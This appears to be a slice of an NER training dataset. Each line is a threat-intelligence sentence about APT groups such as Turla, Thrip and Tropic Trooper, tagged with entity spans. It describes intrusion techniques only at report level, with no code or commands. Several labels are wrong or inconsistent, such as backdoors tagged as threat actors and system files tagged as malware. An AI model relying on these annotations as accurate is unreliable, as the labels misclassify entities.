{"text": "The group used a number of tools common to other Chinese hacking groups , but they had a few unique tools of their own with interfaces developed for Standard ( Simplified ) Chinese .", "spans": {}, "info": {"id": "dnrti_train_001470", "source": "dnrti_train"}}
{"text": "If the address falls within ranges that the attackers are interested in , the malicious site waits for their next page view to drop an exploit on the desirable target 's PC .", "spans": {}, "info": {"id": "dnrti_train_001471", "source": "dnrti_train"}}
{"text": "Visitors to sites exploited by Emissary Panda are directed by code embedded in the sites to a malicious webpage , which screens their IP address .", "spans": {}, "info": {"id": "dnrti_train_001472", "source": "dnrti_train"}}
{"text": "There has also been at least one victim targeted by a spear-phishing attack .", "spans": {}, "info": {"id": "dnrti_train_001473", "source": "dnrti_train"}}
{"text": "A variety of malware , including the PlugX tool , was shared with other known Chinese threat groups .", "spans": {"TOOL: PlugX tool": [[37, 47]]}, "info": {"id": "dnrti_train_001474", "source": "dnrti_train"}}
{"text": "Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network .", "spans": {}, "info": {"id": "dnrti_train_001475", "source": "dnrti_train"}}
{"text": "They used an exploit of Internet Information Server to inject keylogger and backdoor malware onto the Exchange server .", "spans": {"TOOL: keylogger": [[62, 71]], "TOOL: backdoor malware": [[76, 92]]}, "info": {"id": "dnrti_train_001476", "source": "dnrti_train"}}
{"text": "But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface .", "spans": {"TOOL: ASPXTool": [[46, 54]], "TOOL: OwaAuth credential stealing tool": [[189, 221]], "TOOL: Web shell": [[226, 235]]}, "info": {"id": "dnrti_train_001477", "source": "dnrti_train"}}
{"text": "By using such features and tools , attackers are hoping to blend in on the victim 's network and hide their activity in a sea of legitimate processes .", "spans": {}, "info": {"id": "dnrti_train_001478", "source": "dnrti_train"}}
{"text": "TAA leverages advanced artificial intelligence and machine learning that combs through Symantec 's data lake of telemetry in order to spot patterns associated with targeted attacks .", "spans": {"ORGANIZATION: TAA": [[0, 3]], "ORGANIZATION: Symantec": [[87, 95]]}, "info": {"id": "dnrti_train_001479", "source": "dnrti_train"}}
{"text": "January 2018 , TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": {"ORGANIZATION: TAA": [[15, 18]], "ORGANIZATION: telecoms operator": [[49, 66]]}, "info": {"id": "dnrti_train_001480", "source": "dnrti_train"}}
{"text": "Thrip was using PsExec to move laterally between computers on the company 's network .", "spans": {"TOOL: PsExec": [[16, 22]]}, "info": {"id": "dnrti_train_001481", "source": "dnrti_train"}}
{"text": "TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": {"ORGANIZATION: TAA": [[0, 3]], "ORGANIZATION: telecoms operator": [[34, 51]]}, "info": {"id": "dnrti_train_001482", "source": "dnrti_train"}}
{"text": "AA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": {"ORGANIZATION: telecoms operator": [[33, 50]]}, "info": {"id": "dnrti_train_001483", "source": "dnrti_train"}}
{"text": "PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land .", "spans": {"TOOL: PsExec": [[0, 6]]}, "info": {"id": "dnrti_train_001484", "source": "dnrti_train"}}
{"text": "TAA not only flagged this malicious use of PsExec , it also told us what the attackers were using it for .", "spans": {"ORGANIZATION: TAA": [[0, 3]], "TOOL: PsExec": [[43, 49]]}, "info": {"id": "dnrti_train_001485", "source": "dnrti_train"}}
{"text": "Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network .", "spans": {"MALWARE: Infostealer.Catchamas": [[81, 102]]}, "info": {"id": "dnrti_train_001486", "source": "dnrti_train"}}
{"text": "three computers in China being used to launch the Thrip attacks .", "spans": {}, "info": {"id": "dnrti_train_001487", "source": "dnrti_train"}}
{"text": "Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator .", "spans": {"ORGANIZATION: satellite communications operator": [[74, 107]]}, "info": {"id": "dnrti_train_001488", "source": "dnrti_train"}}
{"text": "Thrip seemed to be mainly interested in the operational side of the company .", "spans": {}, "info": {"id": "dnrti_train_001489", "source": "dnrti_train"}}
{"text": "This suggests to us that Thrip 's motives go beyond spying and may also include disruption .", "spans": {}, "info": {"id": "dnrti_train_001490", "source": "dnrti_train"}}
{"text": "Armed with this information about the malware and living off the land tactics being used by this group of attackers whom we named Thrip , we broadened our search to see if we could find similar patterns that indicated Thrip had been targeting other organizations .", "spans": {}, "info": {"id": "dnrti_train_001491", "source": "dnrti_train"}}
{"text": "The group had also targeted three different telecoms operators , all based in Southeast Asia .", "spans": {"ORGANIZATION: telecoms operators": [[44, 62]]}, "info": {"id": "dnrti_train_001492", "source": "dnrti_train"}}
{"text": "In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": {"ORGANIZATION: telecoms companies": [[93, 111]], "ORGANIZATION: customers": [[137, 146]]}, "info": {"id": "dnrti_train_001493", "source": "dnrti_train"}}
{"text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection .", "spans": {"MALWARE: Catchamas": [[0, 9]]}, "info": {"id": "dnrti_train_001494", "source": "dnrti_train"}}
{"text": "Many of the tools they use now feature new behaviors , including a change in the way they maintain a foothold in the targeted network .", "spans": {}, "info": {"id": "dnrti_train_001495", "source": "dnrti_train"}}
{"text": "Execute a command through exploits for CVE-2017-11882 .", "spans": {"VULNERABILITY: CVE-2017-11882": [[39, 53]]}, "info": {"id": "dnrti_train_001496", "source": "dnrti_train"}}
{"text": "Execute a command through exploits for CVE-2018-0802 .", "spans": {"VULNERABILITY: CVE-2018-0802": [[39, 52]]}, "info": {"id": "dnrti_train_001497", "source": "dnrti_train"}}
{"text": "The backdoor will load the encrypted configuration file and decrypt it , then use Secure Sockets Layer ( SSL ) protocol to connect to command-and-control ( C&C ) servers .", "spans": {"TOOL: Secure Sockets Layer": [[82, 102]], "TOOL: SSL": [[105, 108]], "TOOL: command-and-control": [[134, 153]]}, "info": {"id": "dnrti_train_001498", "source": "dnrti_train"}}
{"text": "TClient is actually one of Tropic Trooper 's other backdoors .", "spans": {"TOOL: TClient": [[0, 7]]}, "info": {"id": "dnrti_train_001499", "source": "dnrti_train"}}
{"text": "The malicious loader will use dynamic-link library ( DLL ) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe ( a normal file ) .", "spans": {"MALWARE: sidebar.exe": [[138, 149]], "MALWARE: dllhost.exe": [[161, 172]]}, "info": {"id": "dnrti_train_001500", "source": "dnrti_train"}}
{"text": "TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others .", "spans": {"TOOL: TClient": [[0, 7]]}, "info": {"id": "dnrti_train_001501", "source": "dnrti_train"}}
{"text": "The backdoor noted by other security researchers was encoded with different algorithms and configured with different parameter names in 2016 , for instance .", "spans": {}, "info": {"id": "dnrti_train_001502", "source": "dnrti_train"}}
{"text": "Taiwan has been a regular target of cyber espionage threat actors for a number of years .", "spans": {}, "info": {"id": "dnrti_train_001503", "source": "dnrti_train"}}
{"text": "In early August , Unit 42 identified two attacks using similar techniques .", "spans": {"ORGANIZATION: Unit 42": [[18, 25]]}, "info": {"id": "dnrti_train_001504", "source": "dnrti_train"}}
{"text": "which has been active since at least 2011 .", "spans": {}, "info": {"id": "dnrti_train_001505", "source": "dnrti_train"}}
{"text": "One of the attacks used Tropic Trooper 's known Yahoyah malware , but the other attack deployed the widely available Poison Ivy RAT .", "spans": {"TOOL: Yahoyah malware": [[48, 63]]}, "info": {"id": "dnrti_train_001506", "source": "dnrti_train"}}
{"text": "This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them .", "spans": {"TOOL: Poison Ivy": [[35, 45]], "ORGANIZATION: Trend Micro": [[110, 121]]}, "info": {"id": "dnrti_train_001507", "source": "dnrti_train"}}
{"text": "The document attached to this e-mail exploits CVE-2012-0158 .", "spans": {"VULNERABILITY: e-mail exploits": [[30, 45]], "VULNERABILITY: CVE-2012-0158": [[46, 59]]}, "info": {"id": "dnrti_train_001508", "source": "dnrti_train"}}
{"text": "As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate .", "spans": {"MALWARE: decoy files": [[66, 77]]}, "info": {"id": "dnrti_train_001509", "source": "dnrti_train"}}
{"text": "Further analysis uncovered a handful of ties indicating the actors may also be using the PCShare malware family , which has not been previously tied to the group .", "spans": {"TOOL: PCShare malware family": [[89, 111]]}, "info": {"id": "dnrti_train_001510", "source": "dnrti_train"}}
{"text": "This matches with known Tactics , Techniques , and Procedures ( TTPs ) for Tropic Trooper , targeting both government institutions and also the energy industry in Taiwan .", "spans": {"THREAT_ACTOR: Tropic Trooper": [[75, 89]], "ORGANIZATION: government institutions": [[107, 130]]}, "info": {"id": "dnrti_train_001511", "source": "dnrti_train"}}
{"text": "Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors .", "spans": {"THREAT_ACTOR: Tropic Trooper": [[0, 14]], "VULNERABILITY: CVE-2012-0158": [[40, 53]]}, "info": {"id": "dnrti_train_001512", "source": "dnrti_train"}}
{"text": "The Tropic Trooper threat actor group has been known to target governments and organizations in the Asia Pacific region for at least six years .", "spans": {"THREAT_ACTOR: Tropic Trooper threat actor group": [[4, 37]]}, "info": {"id": "dnrti_train_001513", "source": "dnrti_train"}}
{"text": "Turla is a notorious group that has been targeting governments .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_001514", "source": "dnrti_train"}}
{"text": "Turla is known to run watering hole and spearphishing campaigns to better pinpoint their targets .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_001515", "source": "dnrti_train"}}
{"text": "Turla is a notorious group that has been targeting government officials .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "ORGANIZATION: government officials": [[51, 71]]}, "info": {"id": "dnrti_train_001516", "source": "dnrti_train"}}
{"text": "Turla is a notorious group that has been targeting diplomats .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "ORGANIZATION: diplomats": [[51, 60]]}, "info": {"id": "dnrti_train_001518", "source": "dnrti_train"}}
{"text": "The codename for Turla APT group in this presentation is MAKERSMARK .", "spans": {"THREAT_ACTOR: Turla APT group": [[17, 32]]}, "info": {"id": "dnrti_train_001519", "source": "dnrti_train"}}
{"text": "The Intercept reported that there exists a 2011 presentation by Canada 's Communication Security Establishment ( CSE ) outlining the errors made by the Turla operators during their operations even though the tools they use are quite advanced .", "spans": {"ORGANIZATION: Canada 's Communication Security Establishment": [[64, 110]], "ORGANIZATION: CSE": [[113, 116]], "THREAT_ACTOR: Turla operators": [[152, 167]]}, "info": {"id": "dnrti_train_001520", "source": "dnrti_train"}}
{"text": "The witnessed techniques , tactics and procedures ( TTPs ) are in-line with what we usuallysee in Turla 's operation : a first stage backdoor , such as Skipper , likely delivered through spearphishing followed by the appearance on the compromised system of a second stage backdoor , Gazerin this case .", "spans": {"THREAT_ACTOR: Turla 's operation": [[98, 116]], "TOOL: Skipper": [[152, 159]]}, "info": {"id": "dnrti_train_001521", "source": "dnrti_train"}}
{"text": "Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target .", "spans": {}, "info": {"id": "dnrti_train_001522", "source": "dnrti_train"}}
{"text": "Finally , there are many similarities between Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar .", "spans": {"TOOL: Gazer": [[46, 51]], "TOOL: backdoors": [[75, 84]], "THREAT_ACTOR: Turla": [[97, 102]], "THREAT_ACTOR: Carbon": [[117, 123]], "THREAT_ACTOR: Kazuar": [[128, 134]]}, "info": {"id": "dnrti_train_001523", "source": "dnrti_train"}}
{"text": "Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated .", "spans": {"TOOL: Skipper": [[0, 7]], "TOOL: Gazer": [[75, 80]]}, "info": {"id": "dnrti_train_001524", "source": "dnrti_train"}}
{"text": "Turla APT group makes an extra effort to avoid detection by wiping files securely , changing the strings and randomizing what could be simple markers through the different backdoor versions .", "spans": {"THREAT_ACTOR: Turla APT group": [[0, 15]]}, "info": {"id": "dnrti_train_001525", "source": "dnrti_train"}}
{"text": "The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions .", "spans": {"TOOL: Epic Turla": [[21, 31]], "ORGANIZATION: government institutions": [[110, 133]]}, "info": {"id": "dnrti_train_001526", "source": "dnrti_train"}}
{"text": "Turla all uses an encrypted container to store the malware 's components and configuration and they also log their actions in a file .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "TOOL: encrypted container": [[18, 37]]}, "info": {"id": "dnrti_train_001527", "source": "dnrti_train"}}
{"text": "Over the last 10 months , Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call \" Epic Turla \" .", "spans": {"ORGANIZATION: Kaspersky Lab": [[26, 39]], "TOOL: Epic Turla": [[118, 128]]}, "info": {"id": "dnrti_train_001528", "source": "dnrti_train"}}
{"text": "We also observed exploits against older ( patched ) vulnerabilities , social engineering techniques and watering hole strategies in these attacks .", "spans": {}, "info": {"id": "dnrti_train_001529", "source": "dnrti_train"}}
{"text": "The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": {"TOOL: Epic Turla": [[21, 31]], "ORGANIZATION: embassies": [[110, 119]]}, "info": {"id": "dnrti_train_001530", "source": "dnrti_train"}}
{"text": "The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including military .", "spans": {"TOOL: Epic Turla": [[21, 31]]}, "info": {"id": "dnrti_train_001531", "source": "dnrti_train"}}
{"text": "The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including education .", "spans": {"TOOL: Epic Turla": [[21, 31]]}, "info": {"id": "dnrti_train_001532", "source": "dnrti_train"}}
{"text": "When G-Data published on Turla/Uroburos back in February , several questions remained unanswered .", "spans": {"ORGANIZATION: G-Data": [[5, 11]], "THREAT_ACTOR: Turla/Uroburos": [[25, 39]]}, "info": {"id": "dnrti_train_001533", "source": "dnrti_train"}}
{"text": "The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including research and pharmaceutical companies .", "spans": {"TOOL: Epic Turla": [[21, 31]], "ORGANIZATION: pharmaceutical companies": [[123, 147]]}, "info": {"id": "dnrti_train_001534", "source": "dnrti_train"}}
{"text": "The primary backdoor used in the Epic attacks is also known as \" WorldCupSec \" , \" TadjMakhal \" , \" Wipbot \" or \" Tavdig \" .", "spans": {"THREAT_ACTOR: WorldCupSec": [[65, 76]], "THREAT_ACTOR: TadjMakhal": [[83, 93]], "THREAT_ACTOR: Wipbot": [[100, 106]], "THREAT_ACTOR: Tavdig": [[114, 120]]}, "info": {"id": "dnrti_train_001535", "source": "dnrti_train"}}
{"text": "Thrip 's motive is likely espionage and its targets include those in the communications , geospatial imaging , and defense sectors , both in the United States and Southeast Asia .", "spans": {"ORGANIZATION: defense sectors": [[115, 130]]}, "info": {"id": "dnrti_train_001536", "source": "dnrti_train"}}
{"text": "One big unknown was the infection vector for Turla ( aka Snake or Uroburos ) .", "spans": {"THREAT_ACTOR: Snake": [[57, 62]], "THREAT_ACTOR: Uroburos": [[66, 74]]}, "info": {"id": "dnrti_train_001537", "source": "dnrti_train"}}
{"text": "The mothership server is generally a VPS , which runs the Control panel software used to interact with the victims .", "spans": {"TOOL: VPS": [[37, 40]]}, "info": {"id": "dnrti_train_001538", "source": "dnrti_train"}}
{"text": "the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated .", "spans": {"VULNERABILITY: CVE-2013-5065": [[43, 56]], "VULNERABILITY: EoP exploit": [[57, 68]]}, "info": {"id": "dnrti_train_001539", "source": "dnrti_train"}}
{"text": "Once a victim is confirmed as \" interesting \" , the attackers upload another Epic backdoor which has a unique ID used to control this specific victim .", "spans": {"TOOL: Epic backdoor": [[77, 90]]}, "info": {"id": "dnrti_train_001540", "source": "dnrti_train"}}
{"text": "Our analysis indicates this is a sophisticated multi-stage infection ; which begins with Epic Turla .", "spans": {"TOOL: Epic Turla": [[89, 99]]}, "info": {"id": "dnrti_train_001541", "source": "dnrti_train"}}
{"text": "this attack against a Kaspersky Lab user on August 5 , 2014 .", "spans": {"ORGANIZATION: Kaspersky Lab": [[22, 35]]}, "info": {"id": "dnrti_train_001542", "source": "dnrti_train"}}
{"text": "VENOMOUS BEAR is an advanced , Russia-based adversary that's been active since at least 2004 .", "spans": {"THREAT_ACTOR: VENOMOUS BEAR": [[0, 13]]}, "info": {"id": "dnrti_train_001543", "source": "dnrti_train"}}
{"text": "Venomous Bear has deployed malware to targets using several novel methods .", "spans": {"THREAT_ACTOR: Venomous Bear": [[0, 13]]}, "info": {"id": "dnrti_train_001544", "source": "dnrti_train"}}
{"text": "For years , Turla has relied , among other impersonations , on fake Flash installers to compromise victims .", "spans": {"THREAT_ACTOR: Turla": [[12, 17]], "TOOL: fake Flash installers": [[63, 84]]}, "info": {"id": "dnrti_train_001545", "source": "dnrti_train"}}
{"text": "Turla merely uses the Adobe brand to trick users into downloading the malware .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]]}, "info": {"id": "dnrti_train_001546", "source": "dnrti_train"}}
{"text": "By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016 .", "spans": {"THREAT_ACTOR: Turla": [[53, 58]]}, "info": {"id": "dnrti_train_001547", "source": "dnrti_train"}}
{"text": "Thus , it is clear they are trying to be as stealthy as possible by hiding in the network traffic of the targeted organizations .", "spans": {}, "info": {"id": "dnrti_train_001548", "source": "dnrti_train"}}
{"text": "Finally , some of the victims are also infected with other Turla-related malware such as ComRAT or Gazer .", "spans": {"THREAT_ACTOR: Turla-related": [[59, 72]], "TOOL: malware": [[73, 80]], "TOOL: ComRAT": [[89, 95]], "TOOL: Gazer": [[99, 104]]}, "info": {"id": "dnrti_train_001549", "source": "dnrti_train"}}
{"text": "Kaspersky Lab documented this behavior in 2014 .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]]}, "info": {"id": "dnrti_train_001550", "source": "dnrti_train"}}
{"text": "It is not a new tactic for Turla to rely on fake Flash installers to try to trick the user to install one of their backdoors .", "spans": {"TOOL: fake Flash installers": [[44, 65]]}, "info": {"id": "dnrti_train_001551", "source": "dnrti_train"}}
{"text": "Turla operators could use an already-compromised machine in the network of the victim 's organization to perform a local MitM attack .", "spans": {}, "info": {"id": "dnrti_train_001552", "source": "dnrti_train"}}
{"text": "Our January 2018 white paper was the first public analysis of a Turla campaign called Mosquito .", "spans": {}, "info": {"id": "dnrti_train_001553", "source": "dnrti_train"}}
{"text": "It is not the first time Turla has used generic tools .", "spans": {"THREAT_ACTOR: Turla": [[25, 30]], "TOOL: generic tools": [[40, 53]]}, "info": {"id": "dnrti_train_001554", "source": "dnrti_train"}}
{"text": "In the past , we have seen the group using open-source password dumpers such as Mimikatz .", "spans": {"TOOL: open-source password dumpers": [[43, 71]], "TOOL: Mimikatz": [[80, 88]]}, "info": {"id": "dnrti_train_001555", "source": "dnrti_train"}}
{"text": "Starting in March 2018 , we observed a significant change in the campaign : it now leverages the open source exploitation framework Metasploit before dropping the custom Mosquito backdoor .", "spans": {"TOOL: Metasploit": [[132, 142]]}, "info": {"id": "dnrti_train_001556", "source": "dnrti_train"}}
{"text": "Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure .", "spans": {"MALWARE: malicious file": [[56, 70]]}, "info": {"id": "dnrti_train_001557", "source": "dnrti_train"}}
{"text": "However , to our knowledge , this is the first time Turla has used Metasploit as a first stage backdoor , instead of relying on one of its own tools such as Skipper .", "spans": {"TOOL: Metasploit": [[67, 77]], "TOOL: Skipper": [[157, 164]]}, "info": {"id": "dnrti_train_001558", "source": "dnrti_train"}}
{"text": "Traffic was intercepted on a node between the end machine and the Adobe servers , allowing Turla 's operators to replace the legitimate Flash executable with a trojanized version .", "spans": {}, "info": {"id": "dnrti_train_001559", "source": "dnrti_train"}}
{"text": "At the beginning of March 2018 , as part of our regular tracking of Turla 's activities , we observed some changes in the Mosquito campaign .", "spans": {"THREAT_ACTOR: Turla": [[68, 73]]}, "info": {"id": "dnrti_train_001560", "source": "dnrti_train"}}
{"text": "In this post , we have presented the evolutions of the Turla Mosquito campaign over the last few months .", "spans": {}, "info": {"id": "dnrti_train_001561", "source": "dnrti_train"}}
{"text": "Primary targets for this adversary are in the government , aerospace , NGO , defense , cryptology and education sectors .", "spans": {"ORGANIZATION: education sectors": [[102, 119]]}, "info": {"id": "dnrti_train_001562", "source": "dnrti_train"}}
{"text": "Turla 's campaign still relies on a fake Flash installer but , instead of directly dropping the two malicious DLLs , it executes a Metasploit shellcode and drops , or downloads from Google Drive , a legitimate Flash installer .", "spans": {"TOOL: Metasploit shellcode and drops": [[131, 161]]}, "info": {"id": "dnrti_train_001563", "source": "dnrti_train"}}
{"text": "The Turla espionage group has been targeting various institutions for many years .", "spans": {}, "info": {"id": "dnrti_train_001564", "source": "dnrti_train"}}
{"text": "Recently , we found several new versions of Carbon , a second stage backdoor in the Turla group arsenal .", "spans": {"TOOL: Carbon": [[44, 50]]}, "info": {"id": "dnrti_train_001565", "source": "dnrti_train"}}
{"text": "The Turla group is known to be painstaking and work in stages , first doing reconnaissance on their victims' systems before deploying their most sophisticated tools such as Carbon .", "spans": {"TOOL: Carbon": [[173, 179]]}, "info": {"id": "dnrti_train_001566", "source": "dnrti_train"}}
{"text": "Kaspersky APT Intelligence Reporting subscription , customers received an update in mid-February 2017 .", "spans": {"ORGANIZATION: Kaspersky APT Intelligence Reporting subscription": [[0, 49]]}, "info": {"id": "dnrti_train_001567", "source": "dnrti_train"}}
{"text": "Like previous Turla activity , WhiteBear leverages compromised websites and hijacked satellite connections for command and control ( C2 ) infrastructure .", "spans": {"TOOL: WhiteBear": [[31, 40]]}, "info": {"id": "dnrti_train_001568", "source": "dnrti_train"}}
{"text": "WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report \" Skipper Turla – the White Atlas framework \" from mid-2016 .", "spans": {"TOOL: WhiteBear": [[0, 9]], "TOOL: Skipper Turla": [[55, 68], [141, 154]], "TOOL: White Atlas": [[161, 172]]}, "info": {"id": "dnrti_train_001569", "source": "dnrti_train"}}
{"text": "However , despite the similarities to previous Turla campaigns , we believe that WhiteBear is a distinct project with a separate focus .", "spans": {"TOOL: WhiteBear": [[81, 90]]}, "info": {"id": "dnrti_train_001570", "source": "dnrti_train"}}
{"text": "From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": {"ORGANIZATION: embassies": [[77, 86]]}, "info": {"id": "dnrti_train_001571", "source": "dnrti_train"}}
{"text": "Continued WhiteBear activity later shifted to include defense-related organizations into June 2017 .", "spans": {"ORGANIZATION: defense-related organizations": [[54, 83]]}, "info": {"id": "dnrti_train_001572", "source": "dnrti_train"}}
{"text": "All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": {"TOOL: WhiteBear": [[19, 28]], "ORGANIZATION: embassies": [[53, 62]]}, "info": {"id": "dnrti_train_001573", "source": "dnrti_train"}}
{"text": "Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": {"THREAT_ACTOR: Turla": [[7, 12]], "ORGANIZATION: German Foreign Office staff": [[100, 127]]}, "info": {"id": "dnrti_train_001574", "source": "dnrti_train"}}
{"text": "Our investigation also led to the discovery of dozens of email addresses registered by Turla operators for this campaign and used to receive exfiltrated data from the victims .", "spans": {}, "info": {"id": "dnrti_train_001575", "source": "dnrti_train"}}
{"text": "It mainly targets Microsoft Outlook , a widely used mail client , but also targets The Bat! , a mail client very popular in Eastern Europe .", "spans": {}, "info": {"id": "dnrti_train_001576", "source": "dnrti_train"}}
{"text": "First , Turla steals emails by forwarding all outgoing emails to the attackers .", "spans": {"THREAT_ACTOR: Turla": [[8, 13]]}, "info": {"id": "dnrti_train_001577", "source": "dnrti_train"}}
{"text": "We identified several European governments and defense companies compromised with this group .", "spans": {"ORGANIZATION: defense companies": [[47, 64]]}, "info": {"id": "dnrti_train_001578", "source": "dnrti_train"}}
{"text": "What actually happens is that the malware is able to decode data from the PDF documents and interpret it as commands for the backdoor .", "spans": {"TOOL: PDF documents": [[74, 87]]}, "info": {"id": "dnrti_train_001579", "source": "dnrti_train"}}
{"text": "In early 2018 , multiple media claimed that Turla operators used mail attachments to control infected machines .", "spans": {}, "info": {"id": "dnrti_train_001580", "source": "dnrti_train"}}
{"text": "As detailed in the previous section , this malware is able to manipulate and exfiltrate emails .", "spans": {}, "info": {"id": "dnrti_train_001581", "source": "dnrti_train"}}
{"text": "To our knowledge , Turla is the only espionage group that currently uses a backdoor entirely controlled by emails , and more specifically via PDF attachments .", "spans": {"TOOL: PDF attachments": [[142, 157]]}, "info": {"id": "dnrti_train_001582", "source": "dnrti_train"}}
{"text": "The attackers first infected in March 2017 .", "spans": {}, "info": {"id": "dnrti_train_001583", "source": "dnrti_train"}}
{"text": "Our research shows that compromised organizations are at risk of not only being spied on by the Turla group who planted the backdoor , but also by other attackers .", "spans": {}, "info": {"id": "dnrti_train_001584", "source": "dnrti_train"}}
{"text": "The developers refer to this tool by the name Kazuar , which is a Trojan written using the Microsoft.NET Framework that offers actors complete access to compromised systems targeted by its operator .", "spans": {"TOOL: Kazuar": [[46, 52]]}, "info": {"id": "dnrti_train_001585", "source": "dnrti_train"}}
{"text": "We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": {"TOOL: Kazuar tool": [[15, 26]], "THREAT_ACTOR: Uroburos": [[89, 97]], "THREAT_ACTOR: Snake": [[102, 107]], "ORGANIZATION: embassies": [[155, 164]], "ORGANIZATION: defense contractors": [[167, 186]], "ORGANIZATION: educational institutions": [[189, 213]], "ORGANIZATION: research organizations": [[220, 242]]}, "info": {"id": "dnrti_train_001586", "source": "dnrti_train"}}
{"text": "This is also a full-featured backdoor controlled by email , and which can work independently of any other Turla component .", "spans": {"TOOL: full-featured backdoor": [[15, 37]]}, "info": {"id": "dnrti_train_001587", "source": "dnrti_train"}}
{"text": "A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005 .", "spans": {"TOOL: Kazuar": [[80, 86]]}, "info": {"id": "dnrti_train_001588", "source": "dnrti_train"}}
{"text": "If the hypothesis is correct and the Turla threat group is using Kazuar , we believe they may be using it as a replacement for Carbon and its derivatives .", "spans": {"THREAT_ACTOR: Turla": [[37, 42]], "TOOL: Kazuar": [[65, 71]], "TOOL: Carbon": [[127, 133]]}, "info": {"id": "dnrti_train_001589", "source": "dnrti_train"}}
{"text": "We used a combination of tools such as NoFuserEx , ConfuserEx Fixer , ConfuserEx Switch Killer , and de4d0t in order to deobfuscate the code for in depth analysis .", "spans": {"TOOL: NoFuserEx": [[39, 48]], "TOOL: ConfuserEx Fixer": [[51, 67]], "TOOL: ConfuserEx Switch Killer": [[70, 94]], "TOOL: de4d0t": [[101, 107]]}, "info": {"id": "dnrti_train_001590", "source": "dnrti_train"}}
{"text": "Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" .", "spans": {"ORGANIZATION: Kazuar": [[0, 6]]}, "info": {"id": "dnrti_train_001591", "source": "dnrti_train"}}
{"text": "The subject is a series of targeted attacks against private companies .", "spans": {"ORGANIZATION: private companies": [[52, 69]]}, "info": {"id": "dnrti_train_001592", "source": "dnrti_train"}}
{"text": "e uncovered the activity of a hacking group which has Chinese origins .", "spans": {}, "info": {"id": "dnrti_train_001593", "source": "dnrti_train"}}
{"text": "Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from .", "spans": {}, "info": {"id": "dnrti_train_001594", "source": "dnrti_train"}}
{"text": "According to our estimations , this group has been active for several years and specializes in cyberattacks against the online video game industry .", "spans": {}, "info": {"id": "dnrti_train_001595", "source": "dnrti_train"}}
{"text": "Based on our analysis , we believe that threat actors may compile Windows and Unix based payloads using the same code to deploy Kazuar against both platforms .", "spans": {"ORGANIZATION: Kazuar": [[128, 134]]}, "info": {"id": "dnrti_train_001596", "source": "dnrti_train"}}
{"text": "The group 's main objective is to steal source codes .", "spans": {}, "info": {"id": "dnrti_train_001597", "source": "dnrti_train"}}
{"text": "In 2010 HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers – an American video game company .", "spans": {"ORGANIZATION: HBGary": [[8, 14], [99, 105]], "ORGANIZATION: American video game company": [[124, 151]]}, "info": {"id": "dnrti_train_001598", "source": "dnrti_train"}}
{"text": "In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers – an American video game company .", "spans": {"ORGANIZATION: HBGary": [[17, 23], [108, 114]], "ORGANIZATION: video game company": [[142, 160]]}, "info": {"id": "dnrti_train_001599", "source": "dnrti_train"}}
{"text": "For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically .", "spans": {"THREAT_ACTOR: Winnti group": [[20, 32]], "ORGANIZATION: gaming companies": [[89, 105]]}, "info": {"id": "dnrti_train_001600", "source": "dnrti_train"}}
{"text": "The Axiom group has been presented as an advanced Chinese threat actor carrying out cyber-espionage attacks against a whole range of different industries .", "spans": {"THREAT_ACTOR: Axiom": [[4, 9]]}, "info": {"id": "dnrti_train_001602", "source": "dnrti_train"}}
